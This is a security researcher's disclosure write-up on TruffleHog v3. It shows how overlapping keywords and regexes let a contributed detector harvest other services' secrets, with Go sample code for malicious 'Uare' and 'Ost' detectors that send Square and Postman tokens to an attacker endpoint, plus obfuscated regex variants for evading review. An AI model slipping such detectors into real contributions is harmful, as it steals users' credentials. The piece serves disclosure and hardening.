Writeup: Exploiting TruffleHog v3 - Bending a Security Tool to Steal Secrets

6 March 2024

I started researching TruffleHog during a project for an enterprise client, where I worked in a security team responsible for implementing secret scanning of source code repositories. This blog post highlights several issues identified during that research. When combined, they make it possible to introduce a malicious detector which could harvest checked-in secrets for arbitrary services from anyone running TruffleHog v3.

These issues were reported to Truffle Security in December 2023, who acknowledged the report within hours. I would like to thank them for their transparent and productive collaboration during the responsible disclosure period.

Truffle Security have released their own blog post on the topic which can be found here: https://trufflesecurity.com/blog/contributor-spotlight-helena-rosenzweig-and-assetnote-team

What is TruffleHog?

Secrets should - as the name suggests - be kept secret, since they grant access to protected resources. They should therefore be stored in a secure location such as a key vault and not checked into source code repositories. Yet, it’s common for developers to unintentionally include secrets in their commits.

TruffleHog is an open source, automated security tool that scans code repositories and configuration files for active secrets, such as API keys and access tokens. Unlike many other secret scanners, TruffleHog also verifies whether identified secrets are valid or not. This surfaces active secrets to users so they can revoke them, without having to waste time on false positives.

TruffleHog has 13 thousand stars on GitHub and over 14 million downloads to date according to Truffle Security’s website. Truffle Security also provides an enterprise version of TruffleHog. In 2019 the company secured $14m in funding from venture capital investors to be able to work full time on TruffleHog.

Crowd sourced Detectors

TruffleHog supports the detection and verification of secrets for over 700 services as of the beginning of 2024. Each service has a matching detector, which is essentially a small Go program responsible for detecting and verifying potential matching secrets.

The core components of each detector are its keywords, regular expressions and verification endpoint. The keyword represents a string that is likely to occur in the same context as the secret, such as a variable name. Most detectors have the name of their service as their keyword, such as “twilio” for the Twilio detector. The choice of keyword is very important as there needs to be an occurrence of it present in the chunk of bytes being processed, for the scan to evaluate it against that detector. If there is a keyword match, the scan will move on to the next step of regex matching.

The regex represents the service’s secret pattern and is used to extract strings located near the keyword that match it. If a match has been detected, the string is sent to the verification endpoint provided in the detector. The verification endpoint belongs to the service and should return a status code 200 or 401 indicating whether the string is a valid secret or not.

Below is an example of the detector that detects GitHub tokens:

// Verification endpoint
func (Scanner) DefaultEndpoint() string { return "https://api.github.com" }

var (
  // Regular expression
  keyPat = regexp.MustCompile(`\b((?:ghp|gho|ghu|ghs|ghr|github_pat)_[a-zA-Z0-9_]{36,255})\b`)
)

// Keywords
func (s Scanner) Keywords() []string {
  return []string{"ghp_", "gho_", "ghu_", "ghs_", "ghr_", "github_pat_"}
}

...

// FromData will find and optionally verify GitHub secrets in a given set of bytes.
func (s Scanner) FromData(ctx context.Context, verify bool, data []byte) (results []detectors.Result, err error) {
  dataStr := string(data)
  matches := keyPat.FindAllStringSubmatch(dataStr, -1)

  for _, match := range matches {
    // First match is entire regex, second is the first group.
    if len(match) != 2 {
      continue
    }

    token := match[1]
    s1 := detectors.Result{
      DetectorType: detectorspb.DetectorType_Github,
      Raw:          []byte(token),
      ExtraData: map[string]string{
        "rotation_guide": "https://howtorotate.com/docs/tutorials/github/",
      },
    }

    if verify {
      client := common.SaneHttpClient()
      for _, url := range s.Endpoints(s.DefaultEndpoint()) {
        req, err := http.NewRequestWithContext(ctx, "GET", fmt.Sprintf("%s/user", url), nil)
        if err != nil {
          continue
        }
        req.Header.Add("Content-Type", "application/json; charset=utf-8")
        req.Header.Add("Authorization", fmt.Sprintf("token %s", token))
        res, err := client.Do(req)
        if err == nil {
          if res.StatusCode >= 200 && res.StatusCode < 300 {
            var userResponse userRes
            err = json.NewDecoder(res.Body).Decode(&userResponse)
            res.Body.Close()
            if err == nil {
              s1.Verified = true
              s1.ExtraData["username"] = userResponse.Login
              s1.ExtraData["url"] = userResponse.UserURL
              s1.ExtraData["account_type"] = userResponse.Type
              s1.ExtraData["site_admin"] = fmt.Sprintf("%t", userResponse.SiteAdmin)
              s1.ExtraData["name"] = userResponse.Name
              s1.ExtraData["company"] = userResponse.Company
            }
          }
        }
      }
    }

    if !s1.Verified && detectors.IsKnownFalsePositive(string(s1.Raw), detectors.DefaultFalsePositives, true) {
      continue
    }
    results = append(results, s1)
  }
  return
}

Whenever one of the strings in the keywords array [“ghp_”, “gho_”, “ghu_”, ...] is found in a source file, any subsequent string matching the regex “\b((?:ghp|gho|ghu|ghs|ghr|github_pat)_[a-zA-Z0-9_]{36,255})\b” will be sent to the verification endpoint “https://api.github.com/user”.

TruffleHog provides a function called PrefixRegex, which takes the keyword as its input argument and embeds it into a regular expression. This regular expression, when prepended to the regex of the detector, enforces that the secret will occur at most 40 characters away from the keyword; reducing the number of false positives.

// PrefixRegex ensures that at least one of the given keywords is within
// 20 characters of the capturing group that follows.
// This can help prevent false positives.
func PrefixRegex(keywords []string) string {
  pre := `(?i)(?:`
  middle := strings.Join(keywords, "|")
  post := `)(?:.|[\n\r]){0,40}`
  return pre + middle + post
}

This is especially useful for those detectors that have a generic regex pattern due to the service’s token pattern lacking a specific prefix, such as the case for GitHub tokens. As seen in the Coinbase detector below, the generic structure of Coinbase tokens (64 case insensitive alphanumeric characters) requires a PrefixRegex call to reduce the number of false positives.

var (
  // Make sure that your group is surrounded in boundary characters
  // such as below to reduce false positives.
  keyPat = regexp.MustCompile(detectors.PrefixRegex([]string{"coinbase"}) + `\b([a-zA-Z-0-9]{64})\b`)
)

// Keywords are used for efficiently pre-filtering chunks.
// Use identifiers in the secret preferably, or the provider name.
func (s Scanner) Keywords() []string {
  return []string{"coinbase"}
}

Most detectors contain a PrefixRegex call in the generation of their regex. If a detector has a generic regex but no PrefixRegex call, any string matching against the regex will be sent to the verification endpoint.

The creation of new detectors is crowd sourced, meaning that anyone is welcome to implement a detector and create a pull request for it. All contributions go through an audit by a Truffle Security employee. Once it has been reviewed and accepted, it will be added to the tool. TruffleHog hosted a competition for adding new detectors just as recently as October 2023.

Primary issues

TruffleHog enables all detectors by default. This means that any secrets checked into your source code can potentially be sent to any of the 700+ service providers supported, which you may not even be using. This becomes especially concerning given the following issues:

Issue #1: Overlapping keywords

If a keyword of a detector exists in a data chunk, TruffleHog will apply the detector’s regex to that chunk. If the keyword is a substring of another detector’s keywords, the data chunk will be evaluated against both regular expressions. If there is a match against both regular expressions, the secret will be sent to both verification endpoints.

The probability of a secret matching against multiple regex patterns is quite high since many secrets share common patterns, such as alphanumerical strings of a given length. There are for example 24 detectors that have the regex pattern ([a-zA-Z0-9]{32}), and many more that are supersets matching both this pattern and others.

Issue #2: Secrets can be sent to multiple detectors’ verification endpoints

If the same secret matches multiple detectors, TruffleHog will send it to all matching detectors’ verification endpoints. It’s highly unlikely that the same secret is valid for multiple services, but if a secret matches against multiple detectors it will be leaked to third parties (i.e. other services than that the secret is valid for). This may not be an issue as leaked secrets should be rotated immediately, but a malicious actor with control of a verification service may attempt to use tokens intended for services of other detectors immediately before the owner of the secret has the chance to rotate it.

Implementing a malicious detector: “Uare”

An attacker sets up a fictional SaaS company called “Uare”, with the intent of stealing secrets from the existing detector for Square. As “uare” is a substring of “square”, it is very likely to match against any occurrences of Square secrets in users’ source files. The attacker can construct a malicious detector for the Uare service, which could pass as being legitimate and benign in a review. Of course, this attack requires the malicious detector to masquerade as a legitimate contribution during the review process.

The real Square detector looks for the keyword “EAAA” and matches against the following regex:

// Square detector
var (
  // more context to be added if this is too generic
  secretPat = regexp.MustCompile(
               detectors.PrefixRegex([]string{"square"}) +
               `(EAAA[a-zA-Z0-9\-\+\=]{60})`
              )
)

// Keywords are used for efficiently pre-filtering chunks.
// Use identifiers in the secret preferably, or the provider name.
func (s Scanner) Keywords() []string {
  return []string{"EAAA"}
}

The attacker’s malicious Uare detector could look like the following example below. The keyword and regex pattern would match with secrets following Square’s token format, without being obvious at first glance. The explicit requirement of an “EAAA” prefix has been removed, and instead, a more general regex pattern has been constructed which is a superset of the Square detector’s regex. A localhost verification endpoint is used for demonstration purposes. In a real attack scenario, the attacker would rather setup a site for the Uare service at a suitable domain, which would provide a verification endpoint to be included in the detector.

// Uare detector
var (
  secretPat = regexp.MustCompile(detectors.PrefixRegex([]string{"uare"}) + `([a-zA-Z0-9\-\+\=]{64})`)
)

func (s Scanner) Keywords() []string {
  return []string{"uare"}
}

...

if verify {
  baseURL := "http://localhost:8006"

  client := common.SaneHttpClient()

  req, err := http.NewRequestWithContext(ctx, "POST", baseURL, nil)
  if err != nil {
    continue
  }
  req.Header.Add("Authorization", fmt.Sprintf("Bearer %s", res))
  req.Header.Add("Content-Type", "application/json")
  res, err := client.Do(req)
  if err == nil {
    res.Body.Close() // The request body is unused.

    if res.StatusCode == http.StatusOK || res.StatusCode == http.StatusForbidden {
      s.Verified = true
    }
  }
}

When running the scan against the following file:

We can see that TruffleHog identifies the secret as being potentially valid for both Square and Uare, and thus sends the secret to both verification endpoints. In this scenario it is not a valid Square token and the malicious endpoint always returns true. In a real attack scenario, the attacker would rather return status code 401, to stay undetected.

Unverified results will not be shown for users running TruffleHog with the --only-verified flag, which is common for enterprise usage as part of CI pipelines.

Every time a TruffleHog user scans a repository containing a Square token, the token will be shared with the attacker through the Uare detector’s verification endpoint. In cases where the token is valid, the attacker could use it to impersonate the victim and perform arbitrary actions against the Square API (until the secret has been rotated or revoked).

This attack leverages issue #1, exploiting overlapping keywords and regular expressions in different detectors. Implementing controls to prevent overlapping detectors would mitigate this attack. However, issue #2 would persist, illustrated in the following example:

Implementing a malicious detector: “Ost”

Several detectors do not have the name of their service included amongst their keywords. An example of this is the Postman detector, which only has the string “pmak” as its keyword. An attacker could create a detector which has a keyword that is a subset of the string “postman” such as “ost” (as a detector using the full string “postman” would of course get caught in the review process). The string “pmak” will always be present in a Postman api key, but it is not unlikely that the string “postman” will also occur in its context, such as in the following example:

A detector for the fictive SaaS service “Ost” with the keyword “ost” would match against this postman API key, and any other key following this same format. The attacker could set the regex pattern to something discrete such as the following:

// Ost detector
var (
  keyPat = regexp.MustCompile(detectors.PrefixRegex([]string{"ost"}) + `\b([a-zA-Z-0-9]{59})\b`)
)

func (s Scanner) Keywords() []string {
  return []string{"ost"}
}

Here in the example above, the attacker has omitted the “PMAK-“ prefix, which is present in the Postman detector’s regex:

// Postman detector
var (
  keyPat = regexp.MustCompile(`\b(PMAK-[a-zA-Z-0-9]{59})\b`)
)

By omitting the “PMAK-“ prefix, the attacker has constructed a generic regex which shows no signs of it matching against Postman secrets. The attacker behind the “Ost” detector can now prepend “PMAK-“ to any secret it receives to its verification endpoint; knowing that it will likely be a Postman API key.

Other detectors that are currently vulnerable to this type of attack (i.e. do not have the name of their service as a keyword) are the detectors for Stripe, OpenAI, Dropbox, Mailchimp, RabbitMQ, Shopify and Slack, to name a few.

In this example, the “Ost” detector has a basic regex for demonstration purposes. There are however countless of ways an attacker could obfuscate a regular expression beyond recognition. Below are a few examples of regular expressions that, despite their different appearances, all match against Postman API keys:

keyPat1 = regexp.MustCompile(`\b([a-zA-Z-0-9]{64})\b`)
keyPat2 = regexp.MustCompile(`\b([a-zA-Z]{4}-[a-zA-Z-0-9]{59})\b`)
keyPat3 = regexp.MustCompile(`\b([A-Z]{4}[a-zA-Z-0-9]{60})\b`)
keyPat4 = regexp.MustCompile(`\b([a-zA-Z_.-]{4}-[a-zA-Z-0-9]{58,60})\b`)

Additional Issues

In addition to these primary issues, the following issues which may increase the risk of detectors breaking out of context and matching against other detectors’ secrets were also reported:

Issue #3: Missing PrefixRegex calls

Some detectors do not make use of the PrefixRegex function whereas others do. The absence of it makes it possible for a detector to reach and match against secrets located far beyond its context. An example of such a detector is The Guardian detector, which is both generic in its regex pattern and lacks a PrefixRegex call, allowing it to match against other detectors’ secrets. When running a TruffleHog scan on the following file:

TruffleHog will match the Coinmarketcap secret to The Guardian detector (and ultimately send the secret to The Guardian’s endpoint):

Issue #4: Greedy regex pattern matching

The regex matching uses greedy quantifiers and will select the string matching its pattern located furthest away within its search range (which for most detectors is 40 characters). This makes it possible for a detector to match against other surrounding secrets. Below is an example demonstrating this issue using the Glassnode and Miro detectors, as they have different keywords but share the same regex \b([0-9A-Za-z]{27})\b. When running a TruffleHog scan on the following file:

TruffleHog will match the Miro secret (ending with “500”) with the Glassnode detector, even though there is a Glassnode secret located within closer reach (the string ending with “512”):

This can not only lead to false negatives, but also to secrets being sent to third parties’ endpoints.

Issue #5: Generic keywords

Several detectors have generic keywords, such as “float”, “user”, “wit”, “tru”, “getemail”, “getemails” and “getresponse”, which are likely to exist in many users’ file systems and repositories. Some detectors make up for their generic keyword by having a more specific regex pattern, but not all of them do. This is not an issue in and of itself, but can lead to unintentional exposure of secrets, especially when combined with issues 3 and 4.

Recommendations

The issues presented are not believed to be well-known by users of TruffleHog and may put their secrets at risk during ordinary usage of the tool. TruffleHog already contains opt-in mitigations for some of these, such as the --include-detectors flag which allows users to provide an explicit allow list of detectors to use when performing a scan.

By limiting usage to a subset of detectors for services which are known to be in use by the scanned repository, the likelihood of being exploited by malicious or wide-reaching detectors is reduced.

Other mitigations that might be worthwhile for Truffle Security to consider are:

Improvements

During the responsible disclosure period, Truffle Security made the following improvements to TruffleHog to address the issues covered in this blog post:

  1. TruffleHog no longer attempts verification of the same secret if it is detected by two or more different detectors in a single chunk of data as of v3.67.0. This can be overridden by the --allow-verification-overlap flag.

  2. An improvement to how nearby keywords affect matching of secrets, by using a lazy quantifier in the PrefixRegex function as of v3.67.7.

  3. Several detectors that were not providing much value and were firing often have been removed.

  4. Additional checks and training have been added to the code review process to look for this type of malicious contribution specifically, on top of the existing checks.

These changes are a clear improvement to TruffleHog. There are several approaches that could have been taken to address the raised issues. It is therefore reassuring that Truffle Security chose to implement a solution that is enabled by default, providing an extra guard rail for its users.

To any user that wants to further harden their TruffleHog installation, I recommend whitelisting detectors by setting the --allow-detectors flag. By explicitly setting the --allow-detectors flag, users can limit the attack surface which they are exposing themselves to. An attacker that wants to harvest secrets from other services is not limited to the services that TruffleHog already supports. The --allow-detectors therefore lets users explicitly state which detectors they trust.

Lastly, I would like to thank Truffle Security for being so quick and responsive during the non disclosure period. It has been a pleasure working with them.

Timeline


Helena Rosenzweig

Security Researcher


More in this series: